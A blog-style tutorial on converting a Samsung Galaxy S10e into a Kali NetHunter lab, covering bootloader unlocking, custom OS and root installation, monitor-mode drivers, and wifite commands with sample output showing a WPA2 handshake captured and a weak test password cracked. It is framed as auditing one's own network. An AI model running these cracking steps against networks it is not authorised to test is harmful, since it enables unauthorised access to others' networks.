Table of Contents
1. Introduction
How would you feel if you lost everything? Just imagine one day you pick up your phone, open your banking app and balance is zero. This seems unrealistic, isn’t it? I bet you are thinking it will never happen to you because you are well organized and always keep your stuff secure. As you know there are two types of people … those who assume “this won’t happen to me,” and those who quietly check whether it could. Stealing money from your bank account is complex and difficult task but there is always the first step hacker need to do. Accessing your WiFi network can be the one.
Most people just get connected to the network and do not think how it happening. Only few are aware of different WPA standards and which one to enforce. Don’t worry … if this sounds mysterious or overwhelming. Once you see how things actually work by following this tutorial a black box becomes understandable.
In this knowledge article I will show you how to convert Samsung Galaxy S10e telephone into a controlled mobile security lab that will let you audit your own home network.
When would be a good time to get started if not today?
2. Prerequisites
2.1. Samsung Galaxy S10e
In order to follow all steps you need to have mobile phone Samsung Galaxy S10e. I will refer to exact builds of software so it will not work exactly on other versions like S10 without ‘e’. Although you can easily adjust it by finding right libraries and things should work.
2.2. Computer with USB and adb
You need to have Android Debug Bridge, in short adb, installed on your computer. It comes with Android SDK Platform-Tools.
3. Unlock OEM
3.1. Enabling developer mode
Go to Settings -> About phone, then click multiple times “Build Number” until you will see message confirming that developer mode is enabled.
3.2. OEM unlocking
Under Settings new button will appear “Developer options”, click on it and you will see “OEM unlocking” switch, enable it and confirm choice.
In case you cannot see this switch, check if you are connected to WiFi – for me this was a trick.
3.3. Device unlock mode.
Power off device and with the device powered off, hold Volume down + Bixby and connect USB cable to PC.
You will see new screen with message
A custom OS can cause critical problems in phone and installed
applications. If you want to download a custom OS, press the
volume up key.
Volume up : Continue
Volume up long press: Device unlock mode
Volume down: Cancel (restart phone)
Long press Volume up. You will see next screen
Unlock bootloader?
If you unlock the bootloader, you will be able to install
custom operating system software on this phone. A custom OS is
not subject to the same testing as the original OS, and can
cause your phone and installed applications to stop working
properly. To prevent unauthorized access to your personal data
, unlocking the bootloader will also delete all personal data
from your phone (a "factory data reset ).
Volume up: Yes
Unlock bootloader (may void warranty)
Volume down: No
Do not unlock bootloader and restart phone
Confirm with Volume up button and phone will reboot. Once started you will configure it again like a new one. Enable developer mode same way and turn on “USB debugging” in that section.
4. Heimdall
4.1. Switching to download mode
Power off device and with the device powered off, hold Volume down + Bixby and connect USB cable to PC.
You will see new screen with message
A custom OS can cause critical problems in phone and installed
applications. If you want to download a custom OS, press the
volume up key.
Volume up : Continue
Volume up long press: Device unlock mode
Volume down: Cancel (restart phone)
Press Volume up and you will switch to download mode.
Downloading...
Do not tur off target
Do not disconnect USB cable during the software update!
Volume Down Key + Side key for more than 7 secs
: Cancel (restart phone)
4.2. Heimdall installation package
You need to choose version based on your operating system. In my case I used Mac version. There also Linux and Windows. Install it and follow next step.
4.3. Load recovery file.
To boot phone from custom recovery file you can use heimdall to load it. Download recovery file and place it on the phone with heimdall – it will work because you are in download mode already.
heimdall flash --RECOVERY recovery.img --no-reboot
And you should see an output in terminal
Uploading RECOVERY
100%
RECOVERY upload successful
Ending session...
Releasing device interface...
Whereas on your mobile phone bottom progress bar will indicate 100% progress.
4.4. Custom recovery
Time for physical activity, you have to be quick here. Press Volume Down Key + Side key(Power) for more than 7 secs and once screen turn black immediately Volume Up Key + Bixby + Side key(Power). This should load custom recovery menu.
RECOVERY
Version 23.0 20260110)
Product name - beyondelte
________________________
Reboot system now
Apply update
Factory reset
Advanced
Choose factory reset and proceed with “Format data/factory reset”
5. Installing LineageOS
5.1. Operating system
Download zip package to your computer. On the phone choose Apply update -> Apply from ADB. Your are in ADB sideload header so you can run now adb command from pc to copy zip into device
adb -d sideload lineage-23.0-20260110-nightly-beyond0lte-signed.zip
You will see progress on your phone. Once done proceed again with Apply update -> Apply from ADB.
5.2. Ad-Ons
Download zip package and copy to device with adb
adb -d sideload MindTheGapps-16.0.0-arm64-20250812_214353.zip
You will see progress on mobile screen. During installation you have to accept failed signature verification by choosing “Yes”
Signature verification failed
Install anyway?
_____________________________
No
Yes
After installation is done choose “Reboot system now”. After reboot you will configure your telephone by answering various questions and connecting to WiFi.
Remember to enable Developer options, USB debugging and Advanced restart via Settings -> System -> Buttons -> Power menu -> Advanced restart – toggle this on.
6. Install Magisk – rooting
6.1. Loading install package
Press power button -> Restart -> Recovery. After start choose Apply update -> Apply from ADB.
Download Magisk and push it to device
mv Magisk-v30.6.apk Magisk-v30.6.zip
adb -d sideload Magisk-v30.6.zip
Installation will start automatically but you have to confirm failed signature verification. After installation is done choose “Reboot system now”
6.2. Finishing configuration
After restart open Magisk app and accept Upgrade to full Magisk, then open Magisk app again. Accept additional setup, choose direct install and click “LET’S GO ->” button.
It will show log with progress. New button will appear on bottom right corner “Reboot” – press it. Phone will restart.
7. Install NetHunter
Finally time for NetHunter installation. Download it and push to device.
adb push kali-nethunter-2025.4-beyond0lte-los-sixteen-full.zip /sdcard/Download/kali-nethunter-2025.4-beyond0lte-los-sixteen-full.zip
On the telephone open Magisk app -> Modules -> Install from storage. Choose nethunter zip file and confirm installation (If you cannot see it please enable “Large files” filter on left upper corner). Installation will start, after finished reboot phone.
8. Nexmon
8.1. Zip package
To use WiFi card in monitor mode you need additional drivers.
Download nexmon zip and put it on the phone.
adb push nexmon-s10.zip /sdcard/Download/nexmon-s10.zip
On the telephone open Magisk app -> Modules -> Install from storage. Choose nexmon-s10.zip file and confirm installation (If you cannot see it please enable “Large files” filter on left upper corner). Installation will start, after finished reboot phone.
8.2. Additional lib
Get one more lib and push it to device.
adb push kalilibnexmon.so /tmp/kalilibnexmon.so
then login to android shell
adb shell
su
chown root:root /tmp/kalilibnexmon.so
cp /tmp/kalilibnexmon.so /data/local/nhsystem/kali-arm64/lib/
8.3. Monitoring on and off
To enable monitoring mode execute as root
svc wifi disable; sleep 2; ifconfig wlan0 up; nexutil -s0x613 -i -v2
to switch back to standard mode
nexutil -m0
svc wifi enable
9. Crack WiFi
Disclaimer
______________________
This is for education only.
I am testing my own Wi‑Fi and devices with permission.
Do not try this on networks you do not own or have access to.
Run NetHunter terminal -> New Session -> New Bash Shell.
Switch to root and execute commands to enable monitoring mode.
Open another session as kali@root and run
export LD_PRELOAD=/lib/kalilibnexmon.so
wifite -i wlan0
App will start and you will see table with columns NUM, ESSID, CH, ENCR, PWR, WPS, CLIENT. Find your own network(s) like it is written:
“[+] Select targets) (1-8) separated by commas, dashes or all: give a number(s)”
After providing number and accepting it you will see progress.
9.1. Cracking results
It is slow on the phone, better to use hashcat, which reaching 200000 hashes checked speed on macbook m1 max. Anyways here you can see example result after 27 minutes:
[+] (1/1) Starting attacks against 00:1A:2B:3C:4D:5E (test)
[+] test (57db) WPA Handshake capture: Discovered new client: 00:1B:63:84:45:E6
[+] test (66db) WPA Handshake capture: Captured handshake
[+] saving copy of handhake to hs/handshake_test_00-1A-2B-3C-4D-5E_2026-01-24T21-01-24.cap saved
[+] analysis of captured handshake file:
[+] tshark: .cap file contains a valid handshake for (00:1a:2b:3c:4d:5e)
[+] aircrack: .cap file contains a valid handshake for (00:1A:2B:3C:4D:5E)
[+] Cracking WPA Handshake: Running aircrack-ng with wordlist-probable.txt wordlist
[+] Cracking WPA Handshake: 0.02% ETA: 27m8s @ 125.1kps (current key: football)
[+] Cracked WPA Handshake PSK: tester123
[+] Access Point Name: test
[+] Access Point BSSID: 00:1A:2B:3C:4D:5E
[+] Encryption: WPA
[+] Handshake File: hs/handshake_test_00-1A-2B-3C-4D-5E_2026-01-24T21-01-24.cap
[+] PSK (password): tester123
[+] saved crack result to cracked.json (1 total)
[+] Finished attacking 1 target(s), exiting
I set network with WPA2-PSK and easy password. If password is longer than 12 characters then I doubt I will be able to get it.
10. Conclusion
In this tutorial you have learned how to set your Samsung S10e to be used as ethical hacking device. You also attacked your own network. Now you can enjoy new skills and have fun.
Just one more thing, here you can find useful links of binaries and documentation:
- Heimdall packages
- nethunter-images
- Magisk releases
- LineageOS builds
- LineageOS wiki Samsung S10e
- Nexmon GitHub repo
